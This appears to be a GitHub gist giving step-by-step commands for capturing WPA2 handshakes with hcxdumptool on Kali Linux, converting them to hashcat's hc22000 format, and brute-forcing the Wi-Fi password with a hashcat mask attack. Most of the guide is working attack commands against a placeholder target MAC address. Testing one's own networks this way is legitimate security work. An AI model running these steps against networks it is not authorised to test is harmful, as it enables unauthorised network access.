Skip to content

Instantly share code, notes, and snippets.

@rikka0w0

rikka0w0/hcxdumptool_hashcat_kali.md

Last active April 20, 2024 13:34
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save rikka0w0/6487663848e9c541783a09f93d4a50e3 to your computer and use it in GitHub Desktop.
Save rikka0w0/6487663848e9c541783a09f93d4a50e3 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
hcxdumptool_hashcat_kali.md

Find out if your Wifi adapter supports monitor mode

Windows: netsh wlan show wirelesscapabilities in admin cmd shell, look for Network monitor mode.

Linux: iw list | grep -Fe "Supported interface modes" -n10, look for * monitor in section Supported interface modes:.

In Kali Linux

I boot a live Kali 2024.1 on a 8G USB stick on a Acer ES1-531-P8NJ and install hcxdumptool and hcxtools from the official repo. The version of hcxdumptool from the repo is 6.3.1 as of 20240420.

Stop Wifi related services

sudo systemctl stop NetworkManager
sudo systemctl stop wpa_supplicant

Find the Wifi interface

iwconfig
iw list

Generate mask (Based on target wifi addr)

sudo tcpdump -i wlan0 wlan addr3 TA:RG:ET:__:_M:AC -ddd > attack.bpf

See also: ZerBea/hcxdumptool#420

The --bpfc option is not presented in v6.3.1.

Capture packets

sudo hcxdumptool -i wlan0 -w dumpfile.pcapng --rds=1 --bpf=attack.bpf

Replace wlan with your Wifi interface name. Add -c 1a for looking at channel 1 only.

Convert to a hc22000 format that hashcat do understand

hcxpcapngtool ./dumpfile.pcapng -o test.hc22000

View the hc22000 file content

hcxhashtool -i test.hc22000 --info=stdout

Brute force crack with hashcat (8-12 chars, including letters and number)

hashcat --hwmon-disable -m22000 -a3 -i -1 ?l?u?d .\test.hc22000 "?1?1?1?1?1?1?1?1?1?1?1?1"

I transferred the hc22000 file to my Windows PC and use hashcat (v6.2.6) to crack it.

Note

  1. hcxdumptool does not work on the internal Wifi of Rasp Pi 4b.
  2. Hashcat test: hashcat -m1000 -a3 -i 42EF98F2E9B77304716D2AECA2F0BD96 ?a?a?a?a?a?a?a, the password should be *H4cK*.
  3. Packet capturing with airodump-ng seems to work on Rasp Pi 4b. Commands are sudo airodump-ng wlan0mon -c 13 --bssid TA:RG:ET:__:_M:AC -w dumpfile and hcxpcapngtool dumpfile.cap -o test.hc22000

References:

  1. ZerBea/hcxdumptool#329
  2. ZerBea/hcxdumptool#355
  3. https://www.hackers-arise.com/post/wi-fi-hacking-part-11-the-pmkid-attack
  4. https://node-security.com/posts/cracking-wpa2-with-hashcat/
  5. hashcat/hashcat#2923
  6. https://hashcat.net/forum/thread-10253.html
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment